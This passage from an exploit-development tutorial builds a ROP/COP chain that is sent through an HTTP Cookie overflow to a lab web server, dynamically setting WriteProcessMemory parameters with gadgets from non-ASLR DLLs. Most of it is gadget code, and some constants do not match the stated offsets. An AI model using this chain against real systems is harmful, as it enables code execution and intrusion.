http_request += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0\r\n"
http_request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
http_request += "Accept-Language: en-US,en;q=0.5\r\n"
http_request += "Accept-Encoding: gzip, deflate\r\n"
http_request += "Referer: http://172.16.55.140/\r\n"
http_request += "Cookie: SESSIONID=9349; UserID=" + crash + "; PassWD=;\r\n"
http_request += "Connection: Close\r\n"
http_request += "Upgrade-Insecure-Requests: 1\r\n"

print "[+] Sending exploit..."
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("172.16.55.130", 80))
s.send(http_request)
s.close()

The above PoC places the parameters on the stack and also performs a “jump” over them with add esp, 0x1C. Let’s examine this in the debugger.
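The 0x1C in that gadget is not arbitrary: it is the combined size of the seven DWORDs placed on the stack. A short Python check, using the placeholder values from the PoC, makes this explicit (the list and variable names are just for illustration).

```python
import struct

placeholders = [
    0x61c832e4,  # IAT entry used to locate the function
    0x61c72530,  # return address
    0xFFFFFFFF,  # hProcess
    0x61c72530,  # lpBaseAddress
    0x11111111,  # lpBuffer placeholder
    0x22222222,  # nSize placeholder
    0x1004D740,  # lpNumberOfBytesWritten
]

# Pack each value as a little-endian DWORD, as the PoC does.
block = b"".join(struct.pack("<L", value) for value in placeholders)

# Number of bytes the stack pointer must skip to clear the whole block.
skip = len(block)
```

Seven 4-byte values occupy 0x1C bytes, so add esp, 0x1c moves ESP exactly past the placeholder block.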

The following is the state of the stack- with the kernel32!WriteProcessMemory parameters outlined in red.

The address 0x10015eb4 is a ROP gadget that will add to ESP. After this gadget is executed, we can see the stack moves further down.

We can see that we have moved further into our buffer, where our future ROP gadgets will reside. The parameters for the function call are now “behind” where program execution is- meaning we will not inadvertently corrupt these parameters because they are not within the current execution flow.

Now that this is out of the way- we can “officially” begin our ROP chain to obtain code execution.

lpBuffer

The first thing that we will do is get the lpBuffer parameter, which will contain the pointer to the base of our shellcode, situated. Recall that kernel32!WriteProcessMemory will take in a source buffer and write it somewhere else. Since we have control of the stack, we will just preemptively place our shellcode there. This is where the headache of storing an address near the stack in EAX and ECX will come into play.

As it currently stands, ECX is 0x18 bytes behind the parameter placeholder for lpBuffer.

The goal right now is to increase ECX by 0x18 bytes. Here is the reason for this.

Let’s say we get the parameter placeholder’s location (e.g. the virtual memory address, not the 0x11111111 itself) in ECX (which we will). If we were to read the value of ECX, we would be reading the value 0x2826930. However, if we read the value of dword ptr [ecx] instead- we would be reading the actual value of 0x11111111.

The first part of the image above shows the value of the address itself. The second part of the image shows what happens when we “dereference” (using poi in WinDbg), or extract the value a memory address is pointing to. We can leverage this by using an arbitrary write primitive. When we get the address of the lpBuffer parameter into ECX- we then will not overwrite ECX, but rather dword ptr [ecx]- which will force the address on the stack (which contains the parameter placeholder) to point to something other than 0x11111111.

Remember- every time the process is terminated and restarted- the virtual memory on the stack changes. This is why we need to dynamically resolve this parameter, instead of hardcoding an address.
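The difference between a register's value and what it points to can be sketched with a dictionary standing in for memory. The stack address 0x2826930 is the example value from the text above; the shellcode address is a hypothetical value chosen for this sketch.

```python
# One stack slot: the address of the lpBuffer placeholder and its contents.
memory = {0x02826930: 0x11111111}
ecx = 0x02826930

address_in_register = ecx            # reading ECX itself
value_pointed_to = memory[ecx]       # reading dword ptr [ecx], i.e. poi(ecx)

shellcode_address = 0x02826C00       # hypothetical, resolved at runtime
memory[ecx] = shellcode_address      # models mov dword ptr [ecx], reg
```

The write changes what the stack slot contains while ECX still holds the slot's address, which is how the placeholder gets swapped for a real pointer.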

We will use the following ROP gadgets, in order to make ECX contain the stack address holding the lpBuffer parameter placeholder.

crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001dacc)		# inc ecx ; clc ; mov edx, dword [ecx-0x04] ; ret: ImageLoad.dll (non-ASLR enabled module)

Two things about the above ROP gadgets. First, the clc instruction.

clc is an assembly instruction that clears the “carry” flag (the CF bit in the EFLAGS register). None of our ROP gadgets, now or later, depend on the state of this flag- so it is okay that this instruction resides in this gadget. Additionally, we have a mov edx, dword [ecx-0x4] instruction. Currently, we are not using the EDX register for anything- so this instruction will not disrupt what we are trying to achieve.

Also notably, this set of ROP gadgets only increases ECX by 16 decimal bytes (0x10 hexadecimal)- even though the parameter placeholder for lpBuffer is located 0x18 bytes away (24 decimal bytes).

This is again a “preparatory” procedure for our future ROP gadgets. We need a gadget, similar to the following: mov dword ptr [ecx], reg, where reg refers to any register that contains the stack address of our shellcode and dword ptr [ecx] contains the stack address which is currently serving as the parameter placeholder for lpBuffer. This will essentially take what ECX is pointing to, which is 0x11111111, and overwrite the pointer with the actual address of our shellcode.

However, no such gadgets could be found easily in the process memory. The closest gadget was mov dword ptr [ecx+0x8], eax. Knowing this, we will only raise ECX by 0x10 instead of 0x18- because the gadget writes to the address in ECX at an offset of 0x8 (0x18 - 0x10 = 0x8).
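The offset arithmetic for this step can be checked in a couple of lines. This is only a sketch: the constant names are made up for illustration, and the values are the ones quoted in the text.

```python
# Values are taken from the text; the names are illustrative only.
LPBUFFER_OFFSET = 0x18      # distance from ECX to the lpBuffer placeholder
WRITE_DISPLACEMENT = 0x8    # the write gadget targets [ecx+0x8]

# ECX must stop WRITE_DISPLACEMENT bytes short of the placeholder.
increments_needed = LPBUFFER_OFFSET - WRITE_DISPLACEMENT

print(hex(increments_needed))   # 0x10
print(increments_needed)        # 16 "inc ecx" gadgets
```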

The key is now to give some padding between the space on the stack for our future ROP gadgets and our shellcode. To do this, we will provide approximately 0x300 bytes of space on the stack for remaining ROP gadgets. This will allow us to “simulate” the rest of our ROP gadgets and choose a place on the stack that our shellcode will go, and start performing these calculations now. Think of these 0x300 bytes as “ROP gadget placeholders”. If perhaps we would need more than 0x300 bytes, due to more ROP gadgets needed than anticipated, we would move our shellcode down lower. We will “aim” for 0x300 bytes down the stack, and we will add NOPs to compensate for any of the unused 0x300 bytes (if necessary). The following ROP gadgets can accomplish loading the location of our “shellcode” (future shellcode) into EAX.

crash += struct.pack('<L', 0x1001fce9)		# pop esi ; add esp, 0x8 ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0xfffffd44)		# Shellcode is about negative 0xfffffd44 (0x2dc) bytes away from EAX
crash += struct.pack('<L', 0x90909090)		# Compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)		# Compensate for above ROP gadget
crash += struct.pack('<L', 0x10022f45)		# sub eax, esi ; pop edi ; pop esi ; ret
crash += struct.pack('<L', 0x90909090)		# Compensate for above ROP gadget
crash += struct.pack('<L', 0x90909090)		# Compensate for above ROP gadget

The location where our shellcode will be (your location can be different, depending on how far down the stack you wish to place it) is 0x2dc bytes away from the value in EAX. To load the shellcode address into EAX, we need to increase EAX by 0x2dc bytes. Obviously, this is too much for just consecutive inc eax gadgets. Additionally, if we add the value to EAX directly- the NULL byte problem would kill our exploit. This is because a 32-bit register, like EAX, takes a full 32-bit value, and 0x2dc written out as 32 bits is 0x000002dc- which contains NULL bytes. To address this, we can use negative numbers and subtraction to yield the same result!

The negative representation of 0x2dc will be loaded into ESI. We will then need to also compensate for the add esp, 0x8 instruction. To do this, we will add 0x8 bytes of padding so no gadgets get “jumped over”. Then, we will subtract the value in ESI from EAX- and place the difference in EAX. This will result in the address of where our shellcode will go being placed into EAX. Additionally, we need to compensate for the two pop instructions in the sub eax, esi gadget.
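The negative-number trick can be sketched in Python to make the wrap-around explicit. The helper names (neg32, has_null_byte, sub32) and the starting value of EAX are assumptions for illustration only; they are not part of the PoC.

```python
import struct

MASK32 = 0xFFFFFFFF

def neg32(value):
    """Return the 32-bit two's complement encoding of -value."""
    return (-value) & MASK32

def has_null_byte(dword):
    """True if the little-endian encoding of dword contains a 0x00 byte."""
    return b"\x00" in struct.pack("<L", dword)

def sub32(a, b):
    """Model `sub a, b` on 32-bit registers (wraps modulo 2**32)."""
    return (a - b) & MASK32

distance = 0x2dc
print(has_null_byte(distance))           # True: 0x000002dc packs as dc 02 00 00
print(hex(neg32(distance)))              # 0xfffffd24
print(has_null_byte(neg32(distance)))    # False

# Hypothetical starting value for EAX, only to show the wrap-around.
eax = 0x0012f000
print(hex(sub32(eax, neg32(distance))))  # 0x12f2dc, i.e. eax + 0x2dc

# Decoding the constant used in the listing above:
print(hex(neg32(0xfffffd44)))            # 0x2bc
```

Note that the constant in the listing, 0xfffffd44, decodes to 0x2bc rather than 0x2dc, so it is worth re-deriving the value from the distance your own debugger session shows.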

Let’s view the ROP routine in WinDbg. Program execution reaches our ECX manipulating gadget(s).

Stepping through the 16 gadgets, ECX is now 8 bytes behind the lpBuffer parameter- as expected.

Program execution then redirects to the EAX manipulation routine.

The intended negative value of 0x2dc is placed into ESI.

The value is then subtracted and the difference is placed in EAX! We have successfully loaded the address of where our shellcode will go, further down the stack, into EAX.

Note, the address where our shellcode will go is denoted with NOPs in the above image for visual effect. This was done in the debugger to outline the process taken here.

The last step is to utilize the following ROP gadget to change the lpBuffer parameter placeholder to point to the legitimate parameter (which is the shellcode location down the stack).

crash += struct.pack('<L', 0x10021bfb)		# mov dword [ecx+0x8], eax ; ret: ImageLoad.dll (non-ASLR enabled module)

Program execution reaches the gadget in question.

As we can already see from the image above, 0x11111111 (which is the parameter placeholder for lpBuffer) is what will be overwritten with the contents of EAX (which contains the stack address that points to our shellcode).

State of the lpBuffer parameter placeholder before the instruction is stepped through.

After stepping through the instruction- we can see the lpBuffer parameter placeholder has been dynamically changed to the correct address!

nSize

nSize, as you can recall from earlier, refers to the size of our region of memory we would like written in the process space. We would like the size of our shellcode to be about 0x180 bytes (384 decimal)- as this is more than enough for any type of shellcode.

Since ECX and EAX are being used for stack addresses- let’s use another register for this parameter. Let’s use EDX.

Parsing the application for gadgets, there is a nice one for adding directly to EDX in multiples of 0x20.

crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)

Although the gadget is very nice, as we just need to add to EDX until the value of 0x180 is placed in it, the gadget doesn’t end with a ret- meaning it will not return back to the stack and pick up the next gadget.

Instead, this gadget performs a call edi instruction. This, at first glance- will completely kill our ROP chain, as execution will not redirect back to the stack. However, there is a way around this- with a technique called Call-oriented Programming (COP).

Essentially, since we know that EDI will be called, we could pop the address of a ROP gadget into EDI, which would perform an add esp, X ; ret. Why add esp, X you may ask?

As you may, or may not, know- when a call instruction is executed- it pushes its return address onto the stack. This is done so the callee knows where to return after it is done executing. We can just execute an add esp, X gadget to jump over this return address and back into our ROP chain. However, there is one more thing that we need to take into account from our gadget, and that is push edx.

This will push the EDX register onto the stack before the call instruction pushes its return address onto the stack- meaning a total of 0x8 bytes (2 DWORDs) will be pushed onto the stack. To compensate for this, we will load an add esp, 0x8 ; ret.
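The stack bookkeeping behind this compensation can be modelled with a tiny simulation. The two gadget addresses are the ones used in this post; the function name and the starting stack address are hypothetical, and the model only tracks ESP and EDX.

```python
# Gadget addresses are the ones from the text; everything else is illustrative.
COP_GADGET = 0x1001b884       # add edx, 0x20 ; push edx ; call edi
RETURN_TO_STACK = 0x1001c31e  # add esp, 0x8 ; ret

def run_cop_gadget(esp, edx, edi):
    """Model one pass through the COP gadget and the gadget held in EDI.

    esp is the stack pointer just after the `ret` that entered the COP gadget.
    Returns (esp, edx) once `add esp, 0x8` has finished, right before its
    `ret` pops the next entry of the chain.
    """
    assert edi == RETURN_TO_STACK
    edx = (edx + 0x20) & 0xFFFFFFFF   # add edx, 0x20
    esp -= 4                          # push edx
    esp -= 4                          # call edi pushes its return address
    esp += 8                          # add esp, 0x8 skips both DWORDs
    return esp, edx

start_esp = 0x0012f100                # hypothetical stack address
esp, edx = run_cop_gadget(start_esp, 0, RETURN_TO_STACK)
print(esp == start_esp, hex(edx))     # True 0x20
```

Because ESP ends up exactly where it started, the following ret picks up the next DWORD of the chain as if the call had never happened.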

Here is how our routine of gadgets will look, in totality.

crash += struct.pack('<L', 0x100103ff)		# pop edi ; ret: ImageLoad.dll (non-ASLR enabled module) (Compensation for COP gadget add edx, 0x20)
crash += struct.pack('<L', 0x1001c31e)		# add esp, 0x8 ; ret: ImageLoad.dll (non-ASLR enabled module) (Returns to stack after COP gadget)
crash += struct.pack('<L', 0x10022c4c)		# xor edx, edx ; ret: ImageLoad.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)

Let’s view this all in the debugger.

First, program execution hits our pop edi instruction, which will load the “return to the stack” ROP gadget into EDI.

pop edi places the address of the add esp, 0x8 ; ret gadget into EDI.

The next gadget is hit, which will set EDX to zero so we can start with a “clean slate”.

Now, program execution is ready for the add edx, 0x20 gadget- which will be repeated until EDX has been filled with 0x180.

push edx is then executed, resulting in EDX being placed onto the stack.

call edi is now about to be executed. Stepping through the instruction, with t in WinDbg, pushes the caller’s return address onto the stack.

Our add esp, 0x8 routine is queued up for execution, and successfully returns us back to the stack- where the exact same routine will be repeated until 0x180 is placed into EDX.

After repeating the routine, EDX now contains 0x180.
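The twelve identical lines in the listing can also be generated rather than typed out. The sketch below assumes two hypothetical helpers, p32 and repeat_gadget, which are not part of the original PoC; the gadget addresses are the ones shown above.

```python
import struct

def p32(value):
    """Pack a 32-bit little-endian DWORD."""
    return struct.pack("<L", value)

def repeat_gadget(address, count):
    """Return `count` back-to-back copies of one gadget address."""
    return p32(address) * count

TARGET = 0x180   # desired nSize
STEP = 0x20      # amount added per COP gadget
count = TARGET // STEP                           # 12

nsize_chain = p32(0x100103ff)                    # pop edi ; ret
nsize_chain += p32(0x1001c31e)                   # add esp, 0x8 ; ret (loaded into EDI)
nsize_chain += p32(0x10022c4c)                   # xor edx, edx ; ret
nsize_chain += repeat_gadget(0x1001b884, count)  # add edx, 0x20 ; push edx ; call edi

print(count, len(nsize_chain))                   # 12 60
```

Deriving the count from the target value makes it harder for the number of repeated lines and the intended value to drift apart when the chain is edited later.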

Now that EDX contains our intended value of 0x180, we can use the same kind of mov dword ptr [reg], edx primitive to overwrite the nSize parameter placeholder with our intended value of 0x180.

We will use the ECX register, which still contains the stack address of the (now correct) lpBuffer parameter minus 0x8. Remember, ECX was used at an offset of 0x8 last time, meaning it is 0x8 bytes behind the lpBuffer parameter, which is itself 4 bytes behind the nSize parameter placeholder- for a total of 0xC bytes, or 12 decimal bytes.

As you can see, 0x4 bytes after lpBuffer comes the nSize parameter (as denoted by 0x22222222).

Utilizing inc ecx gadgets, as in a previous ROP routine- we can increase ECX by 12 decimal (0xC) bytes, to load the parameter placeholder address for nSize.

crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c68081)		# inc ecx ; add al, 0x39 ; ret: sqlite3.dll (non-ASLR enabled module)

It should also be noted that each time one of these ROP gadgets executes- the AL register is increased by 0x39. We will compensate for this in the future. Since AL only makes up the lower 8 bits of the EAX register, this will not have much of an adverse effect on what we are trying to accomplish.
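The side effect on EAX can be modelled to see how much compensation will be needed later. This is a sketch only: add_al is a hypothetical helper, and the starting value of EAX is made up rather than taken from the debugger.

```python
def add_al(eax, imm8):
    """Model `add al, imm8`: only the low byte of EAX changes, with no carry into AH."""
    al = (eax + imm8) & 0xFF
    return (eax & 0xFFFFFF00) | al

eax = 0x0012f2dc            # hypothetical value, not taken from the debugger
original = eax
for _ in range(12):         # twelve inc ecx ; add al, 0x39 ; ret gadgets
    eax = add_al(eax, 0x39)

print(hex(original), hex(eax))   # 0x12f2dc 0x12f288
print(hex((12 * 0x39) & 0xFF))   # net change to AL: 0xac
```

The upper 24 bits of EAX are untouched, so the address stays inside the same 256-byte aligned block, but the low byte shifts by 0xac (modulo 0x100) after twelve gadgets.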

The state of the registers before execution can be seen below.

ECX, after the ROP gadgets are executed, is loaded with the address for the nSize parameter placeholder.

A nice gadget can be found, after parsing the PE, to overwrite the parameter placeholder with the legitimate parameter.

crash += struct.pack('<L', 0x1001f5b4)		# mov dword ptr [ecx], edx

The state of the parameters before the overwrite occurs can be seen below.

As we can see, the junk 0x22222222 parameter will be the target for the overwrite.

Stepping through the instruction, we have dynamically changed the parameter placeholder for nSize to the legitimate parameter!

kernel32!WriteProcessMemory

Perfect! All that is left now is to extract our current pointer to kernel32.dll and calculate the offset between kernel32!WriteFileImplementation and kernel32!WriteProcessMemory. After this, we will use the same primitive to dynamically overwrite the kernel32!WriteProcessMemory parameter placeholder so that it points to the actual API.

Currently, ECX (the register we have been leveraging for each of the arbitrary writes to overwrite function parameter placeholders) is 0x14 (20 decimal) bytes away from the kernel32!WriteProcessMemory parameter placeholder.

Knowing this, we will prepare another arbitrary write by decrementing ECX by 0x14 bytes.

crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)
crash += struct.pack('<L', 0x61c27d1b)		# dec ecx ; ret: sqlite3.dll (non-ASLR enabled module)

Once the ROP gadgets have executed, ECX now contains the same address as the parameter placeholder for kernel32!WriteProcessMemory.
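The 0x14 figure follows from the layout of the placeholder frame. The sketch below rebuilds that layout from the order in which the placeholders appear in the PoC, assuming one DWORD per slot; the names FRAME and OFFSETS are illustrative.

```python
# Field order follows the placeholder listing in the PoC; one DWORD per slot.
FRAME = [
    "WriteProcessMemory pointer",
    "return address",
    "hProcess",
    "lpBaseAddress",
    "lpBuffer",
    "nSize",
    "lpNumberOfBytesWritten",
]
OFFSETS = {name: index * 4 for index, name in enumerate(FRAME)}

ecx_at = OFFSETS["nSize"]                       # ECX was left on nSize by the previous write
target = OFFSETS["WriteProcessMemory pointer"]
dec_gadgets = ecx_at - target

print(hex(OFFSETS["lpBuffer"]), hex(OFFSETS["nSize"]))   # 0x10 0x14
print(dec_gadgets)                                        # 20
```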

The goal now is to dereference the kernel32!WriteProcessMemory parameter placeholder and place it in a CPU register we have control over.

Since ECX is reserved for the arbitrary write, we will use EAX to also store the kernel32!WriteProcessMemory parameter placeholder.

Recall that EDX still contains a value of 0x180, from the nSize parameter. After all, we have not manipulated EDX since. Conveniently, the current distance between the address within EAX and the kernel32!WriteProcessMemory parameter placeholder is 0x260.

Since we already have a routine of ROP and COP gadgets that increased EDX to 0x180, we can utilize the EXACT same routine to keep adding to EDX in steps of 0x20 until it holds 0x260! Once EDX contains the value of 0x260, we can subtract it from EAX and place the difference in EAX. This will allow us to store the address of the kernel32!WriteProcessMemory parameter placeholder in EAX. This time, however, since EDI already contains the old “return to the stack” routine- we can just directly add to EDX.

crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)
crash += struct.pack('<L', 0x1001b884)		# add edx, 0x20 ; push edx ; call edi: ImageLoad.dll (non-ASLR enabled module) (COP gadget)

After the add edx COP gadgets execute, EDX contains the distance between the kernel32!WriteProcessMemory parameter placeholder and EAX (which is 0x260).
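Since EDX starts this step at 0x180 and every COP gadget adds 0x20, the number of repetitions needed for a given distance can be computed up front. The helper names below are hypothetical; the constants come from the text.

```python
STEP = 0x20     # each COP gadget adds 0x20 to EDX
START = 0x180   # value left in EDX by the nSize routine

def edx_after(repetitions, start=START):
    """EDX after `repetitions` passes through add edx, 0x20."""
    return (start + repetitions * STEP) & 0xFFFFFFFF

def repetitions_for(target, start=START):
    """Number of passes needed to reach `target`, or None if it is not reachable."""
    delta = target - start
    if delta < 0 or delta % STEP:
        return None
    return delta // STEP

print(repetitions_for(0x260))   # 7
print(hex(edx_after(12)))       # 0x300
```

Going by this arithmetic, seven repetitions take EDX from 0x180 to 0x260, while twelve repetitions give 0x300, so match the number of gadgets to the distance your own debugger reports.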

